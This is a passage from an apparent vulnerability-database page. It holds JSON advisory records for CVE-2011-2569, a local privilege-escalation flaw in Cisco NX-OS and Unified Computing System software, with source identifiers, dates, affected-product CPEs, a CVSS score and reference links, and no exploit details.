        "db": "CNVD",
        "id": "CNVD-2011-4420"
      },
      {
        "db": "VULHUB",
        "id": "VHN-50514"
      },
      {
        "db": "BID",
        "id": "50347"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-002700"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2569"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201110-586"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-10-25T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4420"
      },
      {
        "date": "2011-10-27T00:00:00",
        "db": "VULHUB",
        "id": "VHN-50514"
      },
      {
        "date": "2011-10-24T00:00:00",
        "db": "BID",
        "id": "50347"
      },
      {
        "date": "2011-11-04T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-002700"
      },
      {
        "date": "2011-10-27T21:55:00.730000",
        "db": "NVD",
        "id": "CVE-2011-2569"
      },
      {
        "date": "1900-01-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201110-586"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-10-25T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-4420"
      },
      {
        "date": "2018-10-30T00:00:00",
        "db": "VULHUB",
        "id": "VHN-50514"
      },
      {
        "date": "2015-03-19T08:37:00",
        "db": "BID",
        "id": "50347"
      },
      {
        "date": "2011-11-04T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-002700"
      },
      {
        "date": "2018-10-30T16:26:47.373000",
        "db": "NVD",
        "id": "CVE-2011-2569"
      },
      {
        "date": "2011-11-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201110-586"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "50347"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201110-586"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco Nexus OS and  Cisco Unified Computing System Vulnerability gained in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-002700"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201110-586"
      }
    ],
    "trust": 0.6
  }
}

GHSA-4F6P-CV97-W83Q

Vulnerability from github – Published: 2022-05-14 02:14 – Updated: 2022-05-14 02:14

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2011-2569"
  ],
  "database_specific": {
    "cwe_ids": [],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2011-10-27T21:55:00Z",
    "severity": "MODERATE"
  },
  "details": "Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188.",
  "id": "GHSA-4f6p-cv97-w83q",
  "modified": "2022-05-14T02:14:21Z",
  "published": "2022-05-14T02:14:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-2569"
    },
    {
      "type": "WEB",
      "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=24458"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

FKIE_CVE-2011-2569

Vulnerability from fkie_nvd - Published: 2011-10-27 21:55 - Updated: 2025-04-11 00:51

Severity ?

Summary

References

	URL	Tags
	psirt@cisco.com	http://tools.cisco.com/security/center/viewAlert.x?alertId=24458	Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	http://tools.cisco.com/security/center/viewAlert.x?alertId=24458	Vendor Advisory

Impacted products

Vendor	Product	Version
cisco	nx-os	4.2
cisco	nx-os	5.0
cisco	unified_computing_system	-
cisco	unified_computing_system_infrastructure_and_unified_computing_system_software	1.4$1j$
cisco	unified_computing_system_infrastructure_and_unified_computing_system_software	2.0$1q$

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:cisco:nx-os:4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "AD12220C-CA2A-468B-8348-EA5E85EE27F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:cisco:nx-os:5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7C39522F-401B-4510-B8AD-B57D757D60AE",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:cisco:unified_computing_system:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "301FBC67-7946-479D-ACC5-D54CBD698291",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:cisco:unified_computing_system_infrastructure_and_unified_computing_system_software:1.4\\(1j\\):*:*:*:*:*:*:*",
              "matchCriteriaId": "9BC44EDC-9AA3-4DAF-934E-5E36683EBAB0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:cisco:unified_computing_system_infrastructure_and_unified_computing_system_software:2.0\\(1q\\):*:*:*:*:*:*:*",
              "matchCriteriaId": "6B3C126B-3C93-4CB1-8AE5-875866119A43",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188."
    },
    {
      "lang": "es",
      "value": "Cisco Nexus OS (tambi\u00e9n conocida como NX-OS) v4.2 y v5.0 y Cisco Unified Computing System con software v1.4 y v2.0 no restringen correctamente la l\u00ednea de comandos,permitiendo a usuarios locales conseguir privilegios a trav\u00e9s de vectores no especificados, tambi\u00e9n conocido como Bug ID CSCtf40008, CSCtg18363, CSCtr44645 , CSCts10195 y CSCts10188."
    }
  ],
  "id": "CVE-2011-2569",
  "lastModified": "2025-04-11T00:51:21.963",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "LOCAL",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 6.8,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:L/AC:L/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-10-27T21:55:00.730",
  "references": [
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=24458"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://tools.cisco.com/security/center/viewAlert.x?alertId=24458"
    }
  ],
  "sourceIdentifier": "psirt@cisco.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2011-2569 (GCVE-0-2011-2569)

GSD-2011-2569

VAR-201110-0195

GHSA-4F6P-CV97-W83Q

FKIE_CVE-2011-2569

Tags

Sightings

Nomenclature